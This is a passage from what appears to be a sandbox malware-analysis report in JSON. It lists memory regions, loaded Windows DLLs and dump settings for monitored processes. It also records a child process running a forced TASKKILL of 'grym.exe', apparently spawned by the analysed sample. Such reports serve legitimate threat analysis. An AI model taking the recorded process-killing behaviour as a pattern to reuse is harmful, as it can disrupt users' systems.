], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_2725", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:23.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2726", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:23.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_2727", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_2728", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_2729", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_2730", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 2424832, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2731", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_2732", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 8716287, "entry_point": 0, "filename": null, "id": "region_2733", "name": "private_0x0000000000810000", "norm_filename": null, "region_type": "private_memory", "start_va": 8454144, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9699328, "type": "region", "version": 1 }, "end_va": 11276287, "entry_point": 0, "filename": null, "id": "region_2734", "name": "pagefile_0x0000000000940000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9699328, "timestamp": "00:01:23.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11337728, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_2735", "name": "pagefile_0x0000000000ad0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11337728, "timestamp": "00:01:23.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2736", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:23.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2737", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:23.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_2738", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1787953152, "type": "region", "version": 1 }, "end_va": 1788329983, "entry_point": 1788095304, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2739", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1787953152, "timestamp": "00:01:23.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1788346368, "type": "region", "version": 1 }, "end_va": 1788387327, "entry_point": 1788351642, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2740", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1788346368, "timestamp": "00:01:23.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_2741", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:23.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_2742", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:23.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787924479, "entry_point": 1787783961, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2743", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:23.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 8454143, "entry_point": 0, "filename": null, "id": "region_2744", "name": "private_0x00000000007d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8192000, "timestamp": "00:01:23.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 9568255, "entry_point": 0, "filename": null, "id": "region_2745", "name": "private_0x00000000008e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9306112, "timestamp": "00:01:23.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 36302847, "entry_point": 33357824, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2746", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:23.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2747", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:23.717", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2748", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:23.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2749", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:23.718", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2750", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:23.721", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_2751", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:23.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_2752", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:01:23.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 8978431, "entry_point": 0, "filename": null, "id": "region_2753", "name": "private_0x0000000000850000", "norm_filename": null, "region_type": "private_memory", "start_va": 8716288, "timestamp": "00:01:23.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_2754", "name": "private_0x0000000002330000", "norm_filename": null, "region_type": "private_memory", "start_va": 36896768, "timestamp": "00:01:23.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787699616, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2755", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:23.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2756", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:23.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2757", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:23.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1786404863, "entry_point": 1785919673, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2758", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:23.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1787559936, "type": "region", "version": 1 }, "end_va": 1787658239, "entry_point": 1787564853, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2759", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1787559936, "timestamp": "00:01:23.785", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM grym.exe /IM grym.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_20", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 20, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2760", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:24.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2761", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:24.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2762", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:24.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2763", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2764", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_2765", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_2766", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4087807, "entry_point": 4021385, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2767", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2768", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:24.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2769", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2770", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2771", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2772", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2773", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2774", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2775", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2776", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:24.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_2777", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:24.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2778", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:24.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2779", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:24.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2780", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:24.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2781", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:24.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2782", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:24.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2783", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2784", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 262143, "entry_point": 0, "filename": null, "id": "region_2785", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:24.050", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1601535, "entry_point": 1179648, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2786", "name": "locale.nls", "norm_filename": 